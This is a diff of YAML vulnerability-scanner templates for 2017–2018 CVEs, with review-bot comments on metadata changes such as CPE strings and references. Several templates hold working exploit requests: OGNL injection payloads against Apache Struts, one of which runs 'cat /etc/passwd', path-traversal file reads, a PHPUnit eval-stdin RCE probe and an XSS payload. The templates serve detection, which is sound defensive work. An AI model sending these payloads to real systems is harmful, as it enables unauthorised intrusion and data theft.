@@ -11,15 +11,20 @@ info: - https://isc.sans.edu/diary/22169 - https://github.com/rapid7/metasploit-framework/issues/8064 - https://nvd.nist.gov/vuln/detail/CVE-2017-5638 + - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 + epss-score: 0.9756 + cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"Apache Struts" verified: true + vendor: apache + product: struts tags: cve,cve2017,apache,kev,msf,struts,rce http: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index f6769d355d..bacdfcdaf9 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -16,12 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 - cpe: cpe:2.3:o:intel:active_management_technology_firmware:*:*:*:*:*:*:*:* - epss-score: 0.9746 + epss-score: 0.97453 + cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Active Management Technology" verified: true + vendor: intel + product: active_management_technology_firmware tags: cve,cve2017,amt,intel,tenable,kev http: @@ -29,13 +31,13 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /hw-sys.htm HTTP/1.1 Host: {{Hostname}} - digest-username: admin req-condition: true + digest-username: admin + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 4cddc250c4..89a02cb956 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml 
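Review bot: The cpe for CVE-2017-5689 was `cpe:2.3:o:intel:active_management_technology_firmware:*:...` and is narrowed to `...:6.0:...`, while nothing else in the template changes toward version-specific detection (the request block is only reordered), so consumers that filter or correlate by CPE will now see this template as applying to firmware 6.0 only. The same narrowing of an existing `*` version happens for CVE-2017-9791 (`struts:*` to `struts:2.3.1`) and CVE-2017-9833 (`boa:*` to `boa:0.94.14.21`). Keep the wildcard version unless the matcher really depends on that exact release.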
@@ -14,10 +14,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-5982 - cwe-id: CWE-98 - tags: cve2017,kodi,lfi,edb,cve + cwe-id: CWE-22 + epss-score: 0.0488 + cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kodi + product: kodi + tags: cve2017,kodi,lfi,edb,cve http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 0fb85adfeb..c8ef3c09a9 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -14,9 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 + epss-score: 0.97366 + cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"PhpCollab" + vendor: phpcollab + product: phpcollab tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive http: @@ -33,7 +37,6 @@ http: -----------------------------154934846911423734231554128137-- - - | GET /logos_clients/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index e57fb17702..e25d2159ab 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -11,14 +11,19 @@ info: - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py - https://nvd.nist.gov/vuln/detail/CVE-2017-7269 - https://github.com/edwardz246003/IIS_exploit + - http://www.securitytracker.com/id/1038168 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-7269 cwe-id: CWE-119 - tags: cve,cve2017,rce,windows,iis,kev + epss-score: 0.97156 + cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: internet_information_server + tags: cve,cve2017,rce,windows,iis,kev http: - method: OPTIONS 
@@ -27,19 +32,19 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - regex("", dasl) + - regex("[\d]+(,\s+[\d]+)?", dav) + - regex(".*?PROPFIND", public) + - regex(".*?PROPFIND", allow) + condition: or + - type: word part: header words: - "IIS/6.0" - - type: dsl - dsl: - - regex("", dasl) # lowercase header name: DASL - - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV - - regex(".*?PROPFIND", public) # lowercase header name: Public - - regex(".*?PROPFIND", allow) # lowercase header name: Allow - condition: or - - type: status status: - 200 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 926d22758b..2de8d4390d 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-7391 cwe-id: CWE-79 - tags: cve,cve2017,magmi,xss + epss-score: 0.00204 + cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: magmi_project + product: magmi + tags: cve,cve2017,magmi,xss http: - method: GET @@ -26,10 +30,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -39,3 +39,7 @@ http: part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 813b4721eb..6961066739 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -4,7 +4,6 @@ id: CVE-2017-7615 # To carry out further attacks, please see reference[2] below. # This template works by guessing user ID. # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. - info: name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access author: bp0lr,dwisiswant0 
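Review bot: The dsl matcher for CVE-2017-7269 is moved to the top of the list, but the inline comments on each expression (`# lowercase header name: DASL`, `DAV`, `Public`, `Allow`) are dropped from the re-added block, so the reader loses the explanation of why the variables are `dasl`, `dav`, `public` and `allow` rather than the header names as sent. Restore them on the added lines, e.g. `- regex("[\d]+(,\s+[\d]+)?", dav)  # lowercase header name: DAV`. Under the existing `matchers-condition: and` the reorder itself does not change behaviour, so the comments are the only thing this hunk loses.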
@@ -22,11 +21,13 @@ info: cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 + epss-score: 0.97443 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* - epss-score: 0.97472 - tags: cve,cve2017,mantisbt,unauth,edb metadata: max-request: 5 + vendor: mantisbt + product: mantisbt + tags: cve,cve2017,mantisbt,unauth,edb http: - method: GET @@ -38,6 +39,7 @@ http: - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 8a3ffec857..26ddf1ee87 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -9,14 +9,19 @@ info: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 - https://nvd.nist.gov/vuln/detail/CVE-2017-7921 + - https://ghostbin.com/paste/q2vq2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-7921 cwe-id: CWE-287 - tags: cve,cve2017,auth-bypass,hikvision + epss-score: 0.01169 + cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hikvision + product: ds-2cd2032-i_firmware + tags: cve,cve2017,auth-bypass,hikvision http: - method: GET @@ -26,11 +31,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "application/xml" - part: header diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 7f9f0f3d9b..9e64a33e8d 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml 
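Review bot: `https://ghostbin.com/paste/q2vq2` is added to the CVE-2017-7921 references; a paste-site URL is not a durable reference, and elsewhere in this diff links that are not expected to last are kept in web.archive.org form. The vendor advisory and ICS-CERT links already present cover the issue; if the paste is wanted for the proof-of-concept detail, add an archived copy instead of the live paste URL.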
@@ -10,17 +10,21 @@ info: - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 + - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + epss-score: 0.97555 + cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Joomla" verified: true + vendor: joomla + product: joomla\! tags: cve,cve2017,joomla,sqli - variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 81889522ac..0f5a788895 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) + - https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018 remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 - tags: cve,cve2017,xss,telerik + epss-score: 0.0021 + cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: progress + product: telerik_reporting + tags: cve,cve2017,xss,telerik http: - method: GET @@ -27,12 +32,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and + + - type: status + status: + - 200 
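Review bot: `product: joomla\!` in CVE-2017-8917 carries the CPE 2.3 formatted-string escape for `!` into the human-readable metadata field; every other `product:` added in this diff is the bare name, so anything grouping by product gets `joomla\!` rather than `joomla!`. If this field is derived from the cpe line, the generator should unescape it; otherwise write `product: joomla!` (the `cpe:` line itself must keep `\!`, as the CPE spec requires).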
diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 155a87a2b3..ff189cd1b2 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -10,14 +10,20 @@ info: - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + - https://wpvulndb.com/vulnerabilities/8836 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9288 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + epss-score: 0.00168 + cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: raygun + product: raygun4wp + tags: cve,cve2017,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 56734d9b5b..f6d12d424b 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 + epss-score: 0.01465 + cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: odoo + product: odoo tags: cve,cve2017,odoo,lfi http: @@ -26,6 +30,7 @@ http: - "{{BaseURL}}/base_import/static/etc/passwd" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 291b81f707..d803badb4e 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml 
@@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 + epss-score: 0.00575 + cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: oauth tags: cve,cve2017,atlassian,jira,ssrf,oast http: @@ -29,6 +33,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index e7a4823c1f..9b9ef09ad2 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml 
@@ -10,36 +10,40 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838 + - http://www.securitytracker.com/id/1038838 + - https://security.netapp.com/advisory/ntap-20180706-0002/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* - epss-score: 0.9753 + epss-score: 0.97502 + cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: title:"Struts2 Showcase" fofa-query: title="Struts2 Showcase" + vendor: apache + product: struts tags: cve,cve2017,apache,rce,struts,kev - variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" result: "{{to_number(num1)*to_number(num2)}}" # CMD: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)} - http: - method: POST path: - "{{BaseURL}}/integration/saveGangster.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | 
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description= + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 7aa96e2b33..4805e90355 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml 
@@ -9,22 +9,27 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + - http://www.securitytracker.com/id/1039263 + - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - tags: cve,cve2017,apache,rce,struts,kev + epss-score: 0.97539 + cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: struts + tags: cve,cve2017,apache,rce,struts,kev http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" - headers: - Content-Type: application/xml + body: | @@ -84,9 +89,11 @@ http: + headers: + Content-Type: application/xml + matchers-condition: and matchers: - - type: word words: - "Debugging information" diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 11e25e420d..d002188cf8 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml 
@@ -9,17 +9,19 @@ info: - https://github.com/murataydemir/CVE-2017-9822 - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 - http://www.dnnsoftware.com/community/security/security-center - - http://web.archive.org/web/20210124123810/https://www.securityfocus.com/bid/102213/ + - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + epss-score: 0.97064 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* - epss-score: 0.97311 - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev metadata: max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev http: - raw: @@ -33,10 +35,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '[extensions]' - 'for 16-bit app support' - part: body condition: and - type: status diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 903ce2485e..4d0755ceba 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -15,11 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - cpe: cpe:2.3:a:boa:boa:*:*:*:*:*:*:*:* - epss-score: 0.90626 - tags: boa,lfr,lfi,cve,cve2017,edb + epss-score: 0.48044 + cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: boa + product: boa + tags: boa,lfr,lfi,cve,cve2017,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index c06660b380..a4e08d936c 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml 
@@ -16,13 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2017-9841 cwe-id: CWE-94 - epss-score: 0.9749 - tags: cve,cve2017,php,phpunit,rce,kev + epss-score: 0.97488 + cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:* metadata: max-request: 6 + vendor: phpunit_project + product: phpunit + tags: cve,cve2017,php,phpunit,rce,kev http: - - raw: - | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 @@ -30,35 +32,30 @@ http: Content-Type: text/html - - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} @@ -69,9 +66,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "6dd70f16549456495373a337e6708865" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 90a739e31e..b5e88c3e6a 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml 
@@ -8,17 +8,20 @@ info: reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 - - http://web.archive.org/web/20210226170218/https://www.securityfocus.com/bid/102969 - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 + - http://www.securitytracker.com/id/1040345 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-306 - epss-score: 0.13216 - tags: cve,cve2018,cisco,router + cwe-id: CWE-306,CWE-200 + epss-score: 0.08908 + cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: "cisco" + product: rv132w_firmware + tags: cve,cve2018,cisco,router http: - method: GET @@ -27,15 +30,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body - condition: and words: - "Dump" - "MDM" - "cisco" - "admin" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index a75fb12af8..58d877cbc5 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml 
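Review bot: `vendor: "cisco"` in CVE-2018-0127 is the only quoted vendor value in this diff; CVE-2018-0296 in the same series writes `vendor: cisco`, and every other added vendor/product is a plain scalar. The quotes do not change the parsed value, but they break the file-wide convention and make a generated-looking field look hand-edited; use `vendor: cisco`.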
@@ -11,20 +11,25 @@ info: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd - https://www.exploit-db.com/exploits/44956/ - https://nvd.nist.gov/vuln/detail/CVE-2018-0296 + - http://www.securitytracker.com/id/1041076 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2018-0296 - cwe-id: CWE-22 - epss-score: 0.97492 - tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev + cwe-id: CWE-20,CWE-22 + epss-score: 0.97461 + cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: adaptive_security_appliance_software + tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev http: - method: GET path: - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + headers: Accept-Encoding: deflate diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 3c4db646de..61215e03fd 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -17,9 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000129 cwe-id: CWE-79 - tags: cve,cve2018,jolokia,xss + epss-score: 0.00232 + cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: jolokia + product: jolokia + tags: cve,cve2018,jolokia,xss http: - method: GET @@ -28,9 +32,9 @@ http: - "{{BaseURL}}/jolokia/read?mimeType=text/html" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index a6e17652e4..2bf857215d 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml 
@@ -5,7 +5,7 @@ info: author: milo2012 severity: high description: | - Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. + Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 @@ -15,9 +15,13 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 - tags: cve,cve2018,jolokia,rce,jndi,proxy + epss-score: 0.90131 + cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jolokia + product: webarchive_agent + tags: cve,cve2018,jolokia,rce,jndi,proxy http: - raw: diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 6db4bd4968..bc35701862 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - tags: cve,cve2018,cobbler,auth-bypass + epss-score: 0.01552 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cobblerd + product: cobbler + tags: cve,cve2018,cobbler,auth-bypass http: - raw: @@ -39,9 +43,9 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: word part: header @@ -53,11 +57,11 @@ http: words: - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 1980dbd067..0999bfcb78 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml 
